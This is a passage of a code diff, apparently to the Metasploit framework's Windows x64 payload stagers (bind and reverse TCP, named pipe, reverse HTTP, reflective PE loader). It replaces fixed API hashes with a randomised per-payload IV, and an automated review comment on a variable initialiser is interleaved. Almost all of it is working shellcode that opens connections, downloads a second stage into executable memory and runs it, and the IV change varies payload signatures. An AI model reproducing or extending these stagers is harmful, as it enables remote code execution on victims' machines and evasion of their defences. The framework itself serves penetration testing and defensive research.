second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... mov rbx, rax ; rbx = our new memory address for the new stage 
diff --git a/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb b/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb index f70071f3656ba..1c6c45464cee0 100644 --- a/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb +++ b/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb @@ -121,7 +121,7 @@ def asm_send_uuid(uuid=nil) pop r8 ; nNumberOfBytesToWrite sub rsp, 16 ; allocate + alignment mov r9, rsp ; lpNumberOfBytesWritten - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')} + mov r10d, #{block_api_hash('kernel32.dll', 'WriteFile')} call rbp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten) add rsp, 16 ^ @@ -159,7 +159,7 @@ def asm_bind_named_pipe(opts={}) push 0 ; nDefaultTimeOut push #{chunk_size} ; nInBufferSize push #{chunk_size} ; nOutBufferSize - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')} + mov r10d, #{block_api_hash('kernel32.dll', 'CreateNamedPipeA')} call rbp ; CreateNamedPipeA mov rdi, rax ; save hPipe (using sockrdi convention) @@ -175,11 +175,11 @@ def asm_bind_named_pipe(opts={}) connect_pipe: mov rcx, rdi ; hPipe xor rdx, rdx ; lpOverlapped - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')} + mov r10d, #{block_api_hash('kernel32.dll', 'ConnectNamedPipe')} call rbp ; ConnectNamedPipe ; check for failure - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')} + mov r10d, #{block_api_hash('kernel32.dll', 'GetLastError')} call rbp ; GetLastError cmp rax, 0x217 ; looking for ERROR_PIPE_CONNECTED jz get_stage_size ; success @@ -188,7 +188,7 @@ def asm_bind_named_pipe(opts={}) ; wait before trying again mov rcx, #{retry_wait} - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')} call rbp ; Sleep jmp connect_pipe ^ 
@@ -206,7 +206,7 @@ def asm_bind_named_pipe(opts={}) mov rdx, rsp ; lpMode (PIPE_WAIT) xor r8, r8 ; lpMaxCollectionCount xor r9, r9 ; lpCollectDataTimeout - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')} + mov r10d, #{block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')} call rbp ^ end @@ -221,7 +221,7 @@ def asm_bind_named_pipe(opts={}) mov r9, rsp ; lpNumberOfBytesRead push 0 ; alignment push 0 ; lpOverlapped - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')} call rbp ; ReadFile add rsp, 0x30 ; adjust stack pop rsi ; lpNumberOfBytesRead @@ -246,7 +246,7 @@ def asm_bind_named_pipe(opts={}) pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... ^ @@ -275,7 +275,7 @@ def asm_bind_named_pipe(opts={}) mov rdx, rbx ; lpBuffer push 0 ; lpOverlapped mov rcx, rdi ; hPipe - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')} call rbp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped) add rsp, 0x28 ; slight stack adjustment pop rdx ; lpNumberOfBytesRead 
@@ -294,14 +294,14 @@ def asm_bind_named_pipe(opts={}) pop r8 ; dwFreeType push 0 ; 0 to decommit whole block pop rdx ; dwSize - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')} call rbp ; VirtualFree(payload, 0, MEM_RELEASE) cleanup_file: ; clean up the pipe handle push rdi ; file handle pop rcx ; hFile - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + mov r10d, #{block_api_hash('kernel32.dll', 'CloseHandle')} call rbp ; CloseHandle(hPipe) jmp failure @@ -333,7 +333,7 @@ def asm_bind_named_pipe(opts={}) db "kernel32", 0x00 get_kernel32_name: pop rcx ; - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')} + mov r10d, #{block_api_hash('kernel32.dll', 'GetModuleHandleA')} call rbp ; GetModuleHandleA("kernel32") call get_exit_name @@ -341,7 +341,7 @@ def asm_bind_named_pipe(opts={}) get_exit_name: mov rcx, rax ; hModule pop rdx ; lpProcName - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')} + mov r10d, #{block_api_hash('kernel32.dll', 'GetProcAddress')} call rbp ; GetProcAddress(hModule, "ExitThread") xor rcx, rcx ; dwExitCode call rax ; ExitProcess(0) diff --git a/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb b/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb index fd138edc28691..f6a9891160cef 100644 --- a/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb +++ b/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb @@ -71,7 +71,7 @@ def asm_block_recv_rc4(opts={}) push 4 ; pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, &dwLength, 4, 0 ); add rsp, 32 ; we restore RSP from the api_call so we can pop off RSI next 
@@ -86,7 +86,7 @@ def asm_block_recv_rc4(opts={}) pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx,rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... ; mov rbx, rax ; rbx = our new memory address for the new stage @@ -102,7 +102,7 @@ def asm_block_recv_rc4(opts={}) mov r8, rsi ; length mov rdx, rbx ; the current address into our second stages RWX buffer mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, buffer, length, 0 ); add rsp, 32 ; restore stack after api_call diff --git a/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb b/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb index 5db3fc97f338e..09bb151515d3d 100644 --- a/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb +++ b/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb @@ -143,14 +143,14 @@ def asm_bind_tcp(opts={}) ; perform the call to LoadLibraryA... mov rcx, r14 ; set the param for the library to load - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp ; LoadLibraryA( "ws2_32" ) ; perform the call to WSAStartup... mov rdx, r13 ; second param is a pointer to this struct push 0x0101 ; pop rcx ; set the param for the version requested - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')} call rbp ; WSAStartup( 0x0101, &WSAData ); ; perform the call to WSASocketA... 
@@ -162,7 +162,7 @@ def asm_bind_tcp(opts={}) xor r8, r8 ; we do not specify a protocol inc rax ; mov rdx, rax ; push SOCK_STREAM - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')} call rbp ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 ); mov rdi, rax ; save the socket for later @@ -172,26 +172,26 @@ def asm_bind_tcp(opts={}) ; first 8 bytes as the rest aren't used) mov rdx, r12 ; set the pointer to sockaddr_in struct mov rcx, rdi ; socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')} + mov r10d, #{block_api_hash('ws2_32.dll', 'bind')} call rbp ; bind( s, &sockaddr_in, #{sockaddr_size} ); ; perform the call to listen... xor rdx, rdx ; backlog mov rcx, rdi ; socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')} + mov r10d, #{block_api_hash('ws2_32.dll', 'listen')} call rbp ; listen( s, 0 ); ; perform the call to accept... xor r8, r8 ; we set length for the sockaddr struct to zero xor rdx, rdx ; we dont set the optional sockaddr param mov rcx, rdi ; listening socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')} + mov r10d, #{block_api_hash('ws2_32.dll', 'accept')} call rbp ; accept( s, 0, 0 ); ; perform the call to closesocket... mov rcx, rdi ; the listening socket to close mov rdi, rax ; swap the new connected socket over the listening socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')} call rbp ; closesocket( s ); ; restore RSP so we dont have any alignment issues with the next block... @@ -213,7 +213,7 @@ def asm_block_recv(opts={}) push 4 ; pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, &dwLength, 4, 0 ); add rsp, 32 ; we restore RSP from the api_call so we can pop off RSI next 
@@ -226,7 +226,7 @@ def asm_block_recv(opts={}) pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... @@ -238,7 +238,7 @@ def asm_block_recv(opts={}) mov r8, rsi ; length mov rdx, rbx ; the current address into our second stages RWX buffer mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, buffer, length, 0 ); add rbx, rax ; buffer += bytes_received diff --git a/lib/msf/core/payload/windows/x64/block_api_x64.rb b/lib/msf/core/payload/windows/x64/block_api_x64.rb index f88d8db967c08..ca1d4ef24ec0c 100644 --- a/lib/msf/core/payload/windows/x64/block_api_x64.rb +++ b/lib/msf/core/payload/windows/x64/block_api_x64.rb 
@@ -10,12 +10,31 @@ module Msf ### module Payload::Windows::BlockApi_x64 + @block_api_iv = nil + + def block_api_iv(opts={}) + @block_api_iv ||= rand(0x100000000) + end + def asm_block_api(opts={}) - Rex::Payloads::Shuffle.from_graphml_file( + asm = Rex::Payloads::Shuffle.from_graphml_file( File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x64.graphml'), arch: ARCH_X64, name: 'api_call' ) + iv = opts.fetch(:block_api_iv) { block_api_iv } + # Patch the assembly to set the correct IV + # db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00 => mov r9d, + iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ') + unless asm.include?("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00") + raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})" + end + asm.sub!("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xb9, #{iv_bytes}") + end + + def block_api_hash(mod, func, opts={}) + iv = opts.fetch(:block_api_iv) { block_api_iv } + Rex::Text.block_api_hash(mod, func, iv: iv) end end diff --git a/lib/msf/core/payload/windows/x64/exitfunk_x64.rb b/lib/msf/core/payload/windows/x64/exitfunk_x64.rb index eb529f7080175..f273c6b486805 100644 --- a/lib/msf/core/payload/windows/x64/exitfunk_x64.rb +++ b/lib/msf/core/payload/windows/x64/exitfunk_x64.rb @@ -23,7 +23,7 @@ def asm_exitfunk(opts={}) asm << %Q^ push 0 ; pop rcx ; set the exit function parameter - mov ebx, 0x#{Msf::Payload::Windows.exit_types['seh'].to_s(16)} + mov ebx, #{block_api_hash('kernel32.dll', 'SetUnhandledExceptionFilter')} mov r10d, ebx ; place the correct EXITFUNK into r10d call rbp ; SetUnhandledExceptionFilter(0) push 0 ; @@ -34,7 +34,7 @@ def asm_exitfunk(opts={}) asm << %Q^ push 0 ; pop rcx ; set the exit function parameter - mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)} + mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')} mov r10d, ebx ; place the correct EXITFUNK into r10d call rbp ; call EXITFUNK( 0 ); ^ 
@@ -43,7 +43,7 @@ def asm_exitfunk(opts={}) asm << %Q^ push 0 ; pop rcx ; set the exit function parameter - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ; ExitProcess(0) ^ @@ -51,7 +51,7 @@ def asm_exitfunk(opts={}) asm << %Q^ push 300000 ; 300 seconds pop rcx ; set the sleep function parameter - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')} call rbp ; Sleep(30000) jmp exitfunk ; repeat ^ diff --git a/lib/msf/core/payload/windows/x64/migrate_common_x64.rb b/lib/msf/core/payload/windows/x64/migrate_common_x64.rb index 403d1eca23e6a..0968741347388 100644 --- a/lib/msf/core/payload/windows/x64/migrate_common_x64.rb +++ b/lib/msf/core/payload/windows/x64/migrate_common_x64.rb @@ -31,7 +31,7 @@ def generate(opts={}) #{generate_migrate(opts)} signal_event: mov rcx, qword [rsi] ; Event handle is pointed at by rsi - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + mov r10d, #{block_api_hash('kernel32.dll', 'SetEvent')} call rbp ; SetEvent(handle) call_payload: call qword [rsi+8] ; Invoke the associated payload diff --git a/lib/msf/core/payload/windows/x64/migrate_named_pipe_x64.rb b/lib/msf/core/payload/windows/x64/migrate_named_pipe_x64.rb index 0544571c0bce5..252eb38e4c9c7 100644 --- a/lib/msf/core/payload/windows/x64/migrate_named_pipe_x64.rb +++ b/lib/msf/core/payload/windows/x64/migrate_named_pipe_x64.rb @@ -32,7 +32,7 @@ def generate_migrate(opts = {}) mov rdi, qword [rsi+16] ; The duplicated pipe handle is in the migrate context. signal_pipe_event: mov rcx, qword [rsi] ; Event handle is pointed at by rsi - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + mov r10d, #{block_api_hash('kernel32.dll', 'SetEvent')} call rbp ; SetEvent(handle) call_pipe_payload: call qword [rsi+8] ; call the associated payload 
diff --git a/lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb b/lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb index 61d1e7c78a17c..655cdfa6b87ec 100644 --- a/lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb +++ b/lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb @@ -38,13 +38,13 @@ def generate_migrate(opts={}) sub rsp, #{WSA_SIZE} ; alloc size, plus alignment (used later) mov r13, rsp ; save pointer to this struct sub rsp, 0x28 ; space for api function calls (really?) - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp ; LoadLibraryA('ws2_32') init_networking: mov rdx, r13 ; pointer to the wsadata struct push 2 pop rcx ; Version = 2 - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')} call rbp ; WSAStartup(Version, &WSAData) create_socket: xor r8, r8 ; protocol not specified @@ -55,7 +55,7 @@ def generate_migrate(opts={}) pop rdx ; SOCK_STREAM push 2 pop rcx ; AF_INET - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')} call rbp ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0) xchg rdi, rax ^ diff --git a/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb b/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb index 0ab9cac9f20f1..57fda89e06c0b 100644 --- a/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb +++ b/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb @@ -4,7 +4,6 @@ module Msf module Payload::Windows::ReflectivePELoader_x64 include Payload::Windows::BlockApi_x64 def asm_reflective_pe_loader_x64(opts) - prologue = '' if opts[:is_dll] == true prologue = %( 
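Review bot: Dropping `prologue = ''` leaves `prologue` assigned only inside `if opts[:is_dll] == true`, so for the non-DLL case the later `#{prologue}` interpolation in the same method relies on Ruby hoisting the branch-local to `nil` and interpolating it as an empty string; that works, but it is implicit and unrelated to the IV change this commit is about. Keep the explicit initialiser, or make the intent visible in one line: `prologue = opts[:is_dll] == true ? %(...) : ''`. The enclosing `asm_reflective_pe_loader_x64` method continues well past this hunk.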
@@ -30,7 +29,7 @@ def asm_reflective_pe_loader_x64(opts) mov rdx,[rsp] ; dwSize xor rcx,rcx ; lpAddress xchg rsp,rbp ; Swap shadow stack - mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d,#{block_api_hash('kernel32.dll', 'VirtualAlloc')} call api_call ; VirtualAlloc(lpAddress,dwSize,MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE) xchg rsp,rbp ; Swap shadow stack mov rdi,rax ; Save the new base address to rdi @@ -123,7 +122,7 @@ def asm_reflective_pe_loader_x64(opts) LoadLibraryA: ;mov rcx,rax ; Move the address of library name string to RCX xchg rbp,rsp ; Swap shadow stack - mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d,#{block_api_hash('kernel32.dll', 'LoadLibraryA')} call api_call ; LoadLibraryA(RCX) xchg rbp,rsp ; Swap shadow stack ret ; <- @@ -131,7 +130,7 @@ def asm_reflective_pe_loader_x64(opts) xchg rbp,rsp ; Swap shadow stack mov rcx,r13 ; Move the module handle to RCX as first parameter mov rdx,rax ; Move the address of function name string to RDX as second parameter - mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')} + mov r10d,#{block_api_hash('kernel32.dll', 'GetProcAddress')} call api_call ; GetProcAddress(ebx,[esp+4]) xchg rbp,rsp ; Swap shadow stack ret ; <- @@ -154,7 +153,7 @@ def asm_reflective_pe_loader_x64(opts) xor rdx,rdx ; lpBaseAddress xor r8,r8 ; hProcess xchg rbp,rsp ; Swap shadow stack - mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'FlushInstructionCache')} + mov r10d,#{block_api_hash('kernel32.dll', 'FlushInstructionCache')} call api_call ; FlushInstructionCache(0xffffffff,NULL,NULL); #{prologue} add r13,r12 ; Add the address of entry value to image base diff --git a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb index d6ddf74b7cb6b..bca088486fa98 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb 
@@ -240,7 +240,7 @@ def asm_reverse_http(opts={}) mov r14, 'wininet' push r14 ; Push 'wininet',0 onto the stack mov rcx, rsp ; lpFileName (stackpointer) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp internetopen: @@ -282,7 +282,7 @@ def asm_reverse_http(opts={}) xor r9, r9 ; lpszProxyBypass (NULL) push rbx ; stack alignment push rbx ; dwFlags (0) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetOpenA')} call rbp call load_server_host @@ -296,7 +296,7 @@ def asm_reverse_http(opts={}) push rbx ; dwFlags (0) push 3 ; dwService (3=INTERNET_SERVICE_HTTP) push rbx ; lpszPassword (NULL) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetConnectA')} call rbp ^ @@ -316,7 +316,7 @@ def asm_reverse_http(opts={}) pop rdx push #{proxy_user.length} ; dwBufferLength (proxy_user length) pop r9 - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call rbp ^ end @@ -332,7 +332,7 @@ def asm_reverse_http(opts={}) pop rdx push #{proxy_pass.length} ; dwBufferLength (proxy_pass length) pop r9 - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call rbp ^ end @@ -356,7 +356,7 @@ def asm_reverse_http(opts={}) push rax push rbx ; lplpszAcceptType (NULL) push rbx ; lpszReferer (NULL) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} + mov r10d, #{block_api_hash('wininet.dll', 'HttpOpenRequestA')} call rbp prepare: 
@@ -385,7 +385,7 @@ def asm_reverse_http(opts={}) mov r8, rsp ; lpBuffer (pointer to flags) push 4 pop r9 ; dwBufferLength (4 = size of flags) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call rbp xor r8, r8 ; dwHeadersLen (0) @@ -414,14 +414,14 @@ def asm_reverse_http(opts={}) xor r9, r9 ; lpszVersion (NULL) push rbx ; stack alignment push rbx ; dwOptionalLength (0) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} + mov r10d, #{block_api_hash('wininet.dll', 'HttpSendRequestA')} call rbp test eax, eax jnz allocate_memory set_wait: mov rcx, #{retry_wait} ; dwMilliseconds - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')} call rbp ; Sleep( dwMilliseconds ); ^ @@ -449,7 +449,7 @@ def asm_reverse_http(opts={}) asm << %Q^ failure: ; hard-coded to ExitProcess(whatever) for size - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ; ExitProcess(whatever) ^ end @@ -472,7 +472,7 @@ def asm_reverse_http(opts={}) push 4 pop r8 ; dwNumberOfBytesToRead (4 bytes) mov rcx, rsi ; hFile (request handle) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetReadFile')} call rbp test eax, eax ; did the download fail? jz failure @@ -485,7 +485,7 @@ def asm_reverse_http(opts={}) push 0x40 pop r9 ; flProtect (0x40=PAGE_EXECUTE_READWRITE) mov r8, 0x1000 ; flAllocationType (0x1000=MEM_COMMIT) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ;download stage download_prep: 
@@ -497,7 +497,7 @@ def asm_reverse_http(opts={}) mov r8, rax ; dwNumberOfBytesToRead (incoming stage size) mov rdx, rbx ; lpBuffer (pointer to mem) mov r9, rdi ; lpdwNumberOfByteRead (stack pointer) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetReadFile')} call rbp add rsp, 32 ; clean up reserved space test eax, eax ; did the download fail? @@ -515,7 +515,7 @@ def asm_reverse_http(opts={}) mov r9, rdx ; flProtect (0x40=PAGE_EXECUTE_READWRITE) shl edx, 16 ; dwSize mov r8, 0x1000 ; flAllocationType (0x1000=MEM_COMMIT) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp download_prep: @@ -529,7 +529,7 @@ def asm_reverse_http(opts={}) mov rdx, rbx ; lpBuffer (pointer to mem) mov r8, 8192 ; dwNumberOfBytesToRead (8k) mov r9, rdi ; lpdwNumberOfByteRead (stack pointer) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetReadFile')} call rbp add rsp, 32 ; clean up reserved space diff --git a/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb b/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb index b1706a03bc15c..bebf76919bf1d 100644 --- a/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb @@ -125,7 +125,7 @@ def asm_reverse_named_pipe(opts={}) xor r9, r9 ; lpSecurityAttributes xor r8, r8 ; dwShareMode mov rdx, 0xC0000000 ; dwDesiredAccess(GENERIC_READ|GENERIC_WRITE) - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')} + mov r10d, #{block_api_hash('kernel32.dll', 'CreateFileA')} call rbp ; CreateFileA(...) ; check for failure 
@@ -145,7 +145,7 @@ def asm_reverse_named_pipe(opts={}) else asm << %Q^ failure: - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ^ end @@ -170,7 +170,7 @@ def asm_reverse_named_pipe(opts={}) push 0 ; lpOverlapped mov rdx, rsi ; lpBuffer mov rcx, rdi ; hFile - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')} call rbp ; ReadFile(...) ^ @@ -199,7 +199,7 @@ def asm_reverse_named_pipe(opts={}) pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... mov rbx, rax ; rbx = our new memory address for the new stage @@ -219,7 +219,7 @@ def asm_reverse_named_pipe(opts={}) mov rdx, rbx ; lpBuffer push 0 ; lpOverlapped mov rcx, rdi ; hFile - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')} call rbp ; ReadFile(...) add rsp, 0x28 ; slight stack adjustment ^ @@ -239,14 +239,14 @@ def asm_reverse_named_pipe(opts={}) pop r8 ; dwFreeType push 0 ; 0 pop rdx ; dwSize - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')} call rbp ; VirtualFree(payload, 0, MEM_DECOMMIT) cleanup_file: ; clean up the socket push rdi ; file handle pop rcx ; hFile - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + mov r10d, #{block_api_hash('kernel32.dll', 'CloseHandle')} call rbp ; and try again 
diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb b/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb index 2b7ac932bb185..8af5528c86fe5 100644 --- a/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb @@ -74,7 +74,7 @@ def asm_block_recv_rc4(opts={}) push 4 ; pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, &dwLength, 4, 0 ); ^ @@ -101,7 +101,7 @@ def asm_block_recv_rc4(opts={}) pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx,rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... ; mov rbx, rax ; rbx = our new memory address for the new stage @@ -117,7 +117,7 